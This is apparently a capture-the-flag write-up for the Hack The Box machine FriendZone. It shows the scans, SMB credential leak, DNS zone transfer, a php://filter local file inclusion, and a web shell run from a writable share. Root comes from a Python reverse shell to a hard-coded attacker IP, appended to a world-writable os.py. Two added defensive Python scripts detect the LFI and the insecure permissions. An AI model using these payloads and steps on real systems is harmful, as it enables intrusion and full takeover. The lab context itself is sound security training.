FriendZone
Tue, 24 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.123 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.123
Host is up (0.094s latency).
Not shown: 47601 closed tcp ports (reset), 17927 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Friend Zone Escape software
|_http-server-header: Apache/2.4.29 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2024-09-22T22:40:11+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-09-22T19:40:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.94 seconds
curl 10.10.10.123
<title>Friend Zone Escape software</title>
<center><h2>Have you ever been friendzoned ?</h2></center>
<center><img src="fz.jpg"></center>
<center><h2>if yes, try to get out of this zone ;)</h2></center>
<center><h2>Call us at : +999999999</h2></center>
<center><h2>Email us at: info@friendzoneportal.red</h2></center>
curl 10.10.10.123 -I
HTTP/1.1 200 OK
Date: Sun, 22 Sep 2024 19:45:00 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Fri, 05 Oct 2018 22:52:00 GMT
ETag: "144-577831e9005e6"
Accept-Ranges: bytes
Content-Length: 324
Vary: Accept-Encoding
Content-Type: text/html
crackmapexec smb 10.10.10.123 -u 'guest' -p '' --shares
SMB 10.10.10.123 445 FRIENDZONE [*] Windows 6.1 (name:FRIENDZONE) (domain:) (signing:False) (SMBv1:True)
SMB 10.10.10.123 445 FRIENDZONE [+] \guest:
SMB 10.10.10.123 445 FRIENDZONE [+] Enumerated shares
SMB 10.10.10.123 445 FRIENDZONE Share        Permissions  Remark
SMB 10.10.10.123 445 FRIENDZONE -----        -----------  ------
SMB 10.10.10.123 445 FRIENDZONE print$                    Printer Drivers
SMB 10.10.10.123 445 FRIENDZONE Files                     FriendZone Samba Server Files /etc/Files
SMB 10.10.10.123 445 FRIENDZONE general      READ         FriendZone Samba Server Files
SMB 10.10.10.123 445 FRIENDZONE Development  READ,WRITE   FriendZone Samba Server Files
SMB 10.10.10.123 445 FRIENDZONE IPC$                      IPC Service (FriendZone server (Samba, Ubuntu)
impacket-smbclient guest@10.10.10.123
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# shares
print$
Files
general
Development
IPC$
# use general
# tree
/creds.txt
Finished - 0 files and folders
# cat /creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
# shares
print$
Files
general
Development
IPC$
# use Development
# tree
Finished - 0 files and folders
#
sudo nano /etc/hosts
10.10.10.123 friendzone.red friendzoneportal.red
dig axfr @friendzone.red friendzone.red
; <<>> DiG 9.20.1-1-Debian <<>> axfr @friendzone.red friendzone.red
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 148 msec
;; SERVER: 10.10.10.123#53(friendzone.red) (TCP)
;; WHEN: Mon Sep 23 00:43:20 BST 2024
;; XFR size: 8 records (messages 1, bytes 289)
dig axfr @friendzoneportal.red friendzoneportal.red
; <<>> DiG 9.20.1-1-Debian <<>> axfr @friendzoneportal.red friendzoneportal.red
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.10.123#53(friendzoneportal.red) (TCP)
;; WHEN: Mon Sep 23 00:45:38 BST 2024
;; XFR size: 9 records (messages 1, bytes 309)
curl https://admin.friendzoneportal.red/ -k
<title>Admin Page</title>
<center><h2>Login and break some friendzones !</h2></center>
<center><h2>Spread the love !</h2></center>
<center>
<form name="login" method="POST" action="login.php">
<p>Username : <input type="text" name="username"></p>
<p>Password : <input type="password" name="password"></p>
<p><input type="submit" value="Login"></p>
</form>
</center>
<form>
https://admin.friendzoneportal.red/login.php
admin:WORKWORKHhallelujah@#
<h1>Admin page is not developed yet !!! check for another one</h1>
curl https://administrator1.friendzone.red/ -k
<head>
<title>FriendZone Corp Administrator login page</title>
</head>
<body>
<br><br>
<center><h2>Login Form for FriendZone</h2></center>
<div class="login-page">
<div class="form">
<form class="register-form">
<input type="text" placeholder="name"/>
<input type="password" placeholder="password"/>
<input type="text" placeholder="email address"/>
<button>create</button>
<p class="message">Already registered? <a href="#">Sign In</a></p>
</form>
<form method="POST" action="login.php" name="Login" class="login-form">
<input type="text" name="username" placeholder="username"/>
<input type="password" name="password" placeholder="password"/>
<button>login</button>
</form>
</div>
</div>
https://administrator1.friendzone.red/login.php
admin:WORKWORKHhallelujah@#
Login Done ! visit /dashboard.php
https://administrator1.friendzone.red/dashboard.php
<html>
<head>
<title>FriendZone Admin !</title>
</head>
<body>
<br><br><br>
<center>
<h2>Smart photo script for friendzone corp !</h2>
</center>
<center>
<h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3>
</center>
<br><br>
<center>
<p>image_name param is missed !</p>
</center>
<center>
<p>please enter it to show the image</p>
</center>
<center>
<p>default is image_id=a.jpg&pagename=timestamp</p>
</center>
</body>
</html>
ffuf -u 'https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=FUZZ' -v \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-H "Cookie: FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1" \
-of html -o ~/ffufreport-lfi \
-mc 200 -fs 354 -fw 0 \
| sed -e 's/| URL | //g' -e '/\* FUZZ:/d';
echo "\nReport: file:///home/$USER/ffufreport-lfi"
ffuf v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Header : Cookie: FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1
:: Output file : /home/daddybigfish/ffufreport-lfi
:: File format : html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
:: Filter : Response size: 354
:: Filter : Response words: 0
________________________________________________
[Status: 200, Size: 866, Words: 38, Lines: 1, Duration: 25ms]
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login
[Status: 200, Size: 1914, Words: 38, Lines: 1, Duration: 22ms]
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard
https://...&pagename=php://filter/convert.base64-encode/resource=login
echo '<base64 string from the response above>' | base64 -d
<?php
$username = $_POST["username"];
$password = $_POST["password"];
//echo $username === "admin";
//echo strcmp($username,"admin");
if ($username==="admin" and $password==="WORKWORKHhallelujah@#"){
    setcookie("FriendZoneAuth", "e7749d0f4b4da5d03e6e9196fd1d18f1", time() + (86400 * 30)); // 86400 = 1 day
    echo "Login Done ! visit /dashboard.php";
}else{
    echo "Wrong !";
}
?>
https://...&pagename=php://filter/convert.base64-encode/resource=dashboard
PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo=
echo '<base64 string above>' | base64 -d
<?php
//echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
//echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
echo "<title>FriendZone Admin !</title>";
$auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
    echo "<br><br><br>";
    echo "<center><h2>Smart photo script for friendzone corp !</h2></center>";
    echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>";
    if(!isset($_GET["image_id"])){
        echo "<br><br>";
        echo "<center><p>image_name param is missed !</p></center>";
        echo "<center><p>please enter it to show the image</p></center>";
        echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>";
    }else{
        $image = $_GET["image_id"];
        echo "<center><img src='images/$image'></center>";
        echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>";
        include($_GET["pagename"].".php");
        //echo $_GET["pagename"];
    }
}else{
    echo "<center><p>You can't see the content ! , please login !</center></p>";
}
?>
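The `include($_GET["pagename"].".php")` above concatenates attacker-controlled input straight into `include()`, which is why a `php://filter` wrapper returns source and an absolute path into a writable share runs an uploaded file; the fix is an allow-list of page names. The following Python detector is added here (not part of the original write-up) and applies that allow-list idea to constructed Apache access-log lines, flagging `pagename` values that are wrappers, traversal, absolute paths or not on the list; the allow-list containing only `timestamp` is an assumption taken from the dashboard's own hint.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (not captured from the box). The request paths
# mirror the dashboard.php parameters seen in this write-up.
SAMPLE_LOG = """\
10.10.14.3 - - [23/Sep/2024:00:50:01 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 866
10.10.14.3 - - [23/Sep/2024:00:50:09 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login HTTP/1.1" 200 1914
10.10.14.3 - - [23/Sep/2024:00:51:22 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell HTTP/1.1" 200 512
10.10.14.3 - - [23/Sep/2024:00:52:03 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 512
10.10.14.3 - - [23/Sep/2024:00:53:00 +0300] "GET /index.html HTTP/1.1" 200 324
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Page names dashboard.php legitimately includes. Assumed here from the "default is
# pagename=timestamp" hint; the real application never defined such a list.
ALLOWED_PAGES = {"timestamp"}

def classify_pagename(value):
    """Return why a pagename value is suspicious for include($_GET["pagename"].".php"), or None."""
    v = unquote(value)  # parse_qs decoded once already; a second pass exposes double-encoding
    if re.match(r"[a-z][a-z0-9+.-]*://", v, re.IGNORECASE):
        return "stream wrapper"            # php://filter, data:// and similar
    if ".." in v.replace("\\", "/").split("/"):
        return "path traversal"
    if v.startswith("/"):
        return "absolute path"             # e.g. a file dropped on a writable share
    if v not in ALLOWED_PAGES:
        return "not in allow-list"
    return None

def scan_log(text):
    """Return (ip, timestamp, decoded pagename, reason) for suspicious dashboard.php hits."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if parts.path != "/dashboard.php":
            continue
        for value in parse_qs(parts.query).get("pagename", []):
            reason = classify_pagename(value)
            if reason:
                findings.append((m.group("ip"), m.group("ts"), unquote(value), reason))
    return findings

if __name__ == "__main__":
    for ip, ts, page, reason in scan_log(SAMPLE_LOG):
        print("%s %s pagename=%r: %s" % (ts, ip, page, reason))
```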
FriendZone Samba Server Files /etc/Files
impacket-smbclient guest@10.10.10.123
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Type help for list of commands
# use Development
# put shell.php
# tree
/shell.php
Finished - 0 files and folders
https://...&pagename=/etc/Development/shell
ls ../var/www
admin
friendzone
friendzoneportal
friendzoneportaladmin
html
mysql_data.conf
uploads
cat ../var/www/mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
friend:Agpyu12!0.213$
ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ED25519 key fingerprint is SHA256:ERMyoo9aM0mxdTvIh0kooJS+m3GwJr6Q51AG9/gTYx4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts.
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
friend@FriendZone:~$ ls
user.txt
friend@FriendZone:~$ cat user.txt
791570d477a7a68e88041b524787b348
friend@FriendZone:~$ curl 10.10.16.7:8088/linpeas.sh
Command 'curl' not found, but can be installed with:
apt install curl
Please ask your administrator.
friend@FriendZone:~$ wget 10.10.16.7:8088/linpeas.sh
--2024-09-23 23:52:40-- http://10.10.16.7:8088/linpeas.sh
Connecting to 10.10.16.7:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[========================================================>] 828.05K 1.06MB/s in 0.8s
2024-09-23 23:52:41 (1.06 MB/s) - ‘linpeas.sh’ saved [847920/847920]
friend@FriendZone:~$ bash linpeas.sh
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 437 0.0 0.3 31320 3308 ? Ss 02:17 0:00 /usr/sbin/cron -f
root 2162 0.0 0.3 58792 3160 ? S 03:26 0:00 _ /usr/sbin/CRON -f
root 2163 0.0 0.0 4628 820 ? Ss 03:26 0:00 | _ /bin/sh -c /opt/server_admin/reporter.py
root 2164 0.0 0.9 32420 8652 ? S 03:26 0:00 | _ /usr/bin/python /opt/server_admin/reporter.py
root 2165 0.0 0.4 21472 3800 ? S 03:26 0:00 | _ /bin/bash -i
root 2177 0.0 0.3 58792 3160 ? S 03:28 0:00 _ /usr/sbin/CRON -f
root 2178 0.0 0.0 4628 916 ? Ss 03:28 0:00 | _ /bin/sh -c /opt/server_admin/reporter.py
root 2179 0.0 0.9 32420 8352 ? S 03:28 0:00 | _ /usr/bin/python /opt/server_admin/reporter.py
root 2180 0.0 0.4 21472 3896 ? S 03:28 0:00 | _ /bin/bash -i
root 2190 0.0 0.3 58792 3160 ? S 03:30 0:00 _ /usr/sbin/CRON -f
root 2191 0.0 0.0 4628 816 ? Ss 03:30 0:00 _ /bin/sh -c /opt/server_admin/reporter.py
root 2192 0.0 0.9 32420 8572 ? S 03:30 0:00 _ /usr/bin/python /opt/server_admin/reporter.py
root 2193 0.0 0.4 21472 3800 ? S 03:30 0:00 _ /bin/bash -i
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/usr/lib/python2.7
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group friend:
/usr/lib/python2.7/os.pyc
friend@FriendZone:~$ nano /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub schedu$
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
friend@FriendZone:/usr/lib/python2.7$ nano os.py
# added to end of file
import socket
import subprocess
import os
# Change these variables to your attacker's IP address and port
ATTACKER_IP = "10.10.16.7"
ATTACKER_PORT = 4435
# Create a socket connection
s = socket.socket()
s.connect((ATTACKER_IP, ATTACKER_PORT))
# Redirect input, output, and error to the socket
os.dup2(s.fileno(), 0) # Standard input (stdin)
os.dup2(s.fileno(), 1) # Standard output (stdout)
os.dup2(s.fileno(), 2) # Standard error (stderr)
# Execute an interactive bash shell
subprocess.call(["/bin/bash", "-i"])
Listening on 0.0.0.0 4435
Connection received on 10.10.10.123 33538
bash: cannot set terminal process group (2163): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~#
root@FriendZone:~# cat /root/root.txt
7a31f7a7992bd6469c38fd7fed8be2d1
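The privilege escalation above works because a root cron job runs /opt/server_admin/reporter.py, which imports os, and /usr/lib/python2.7/os.py is writable by everyone. As an added example (not part of the write-up), a Python audit that flags import-path directories and modules a non-root user could modify, run against a constructed temporary layout mirroring the finding; by default only root-owned, owner-writable entries count as safe.

```python
import os
import stat
import sys
import tempfile

# Audit import-path directories for entries a non-privileged user could modify.
# On this box /usr/lib/python2.7/os.py was world writable and a root cron job ran a
# script that imported it, so whoever could write the module ran code as root.

def insecure_entries(paths, trusted_uids=(0,)):
    """Return [(path, reason)] for directories or modules on `paths` that are writable
    by group/other or owned by an untrusted UID. Only each directory and its top-level
    .py/.pyc/.pth entries are checked; package subdirectories are not walked."""
    findings = []
    for entry in dict.fromkeys(p for p in paths if p):   # de-duplicate, keep order
        if not os.path.isdir(entry):
            continue
        to_check = [entry] + [os.path.join(entry, n) for n in sorted(os.listdir(entry))
                              if n.endswith((".py", ".pyc", ".pth"))]
        for p in to_check:
            st = os.lstat(p)
            if stat.S_ISLNK(st.st_mode):
                findings.append((p, "symlink on import path"))
                continue
            if st.st_uid not in trusted_uids:
                findings.append((p, "owned by untrusted uid %d" % st.st_uid))
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((p, "group/world writable mode %s" % oct(stat.S_IMODE(st.st_mode))))
    return findings

def demo():
    """Constructed layout mirroring the finding on this box: a safely permissioned library
    directory containing a world-writable os.py next to a correctly permissioned module."""
    lib = tempfile.mkdtemp(prefix="python2.7-")
    os.chmod(lib, 0o755)
    for name, mode in (("os.py", 0o666), ("stat.py", 0o644)):
        path = os.path.join(lib, name)
        with open(path, "w") as fh:
            fh.write("# placeholder module\n")
        os.chmod(path, mode)
    # The temp dir is owned by the current user, so treat that UID as trusted here.
    return insecure_entries([lib], trusted_uids=(os.getuid(),))

if __name__ == "__main__":
    for path, reason in insecure_entries(sys.path):
        print("%s: %s" % (path, reason))
```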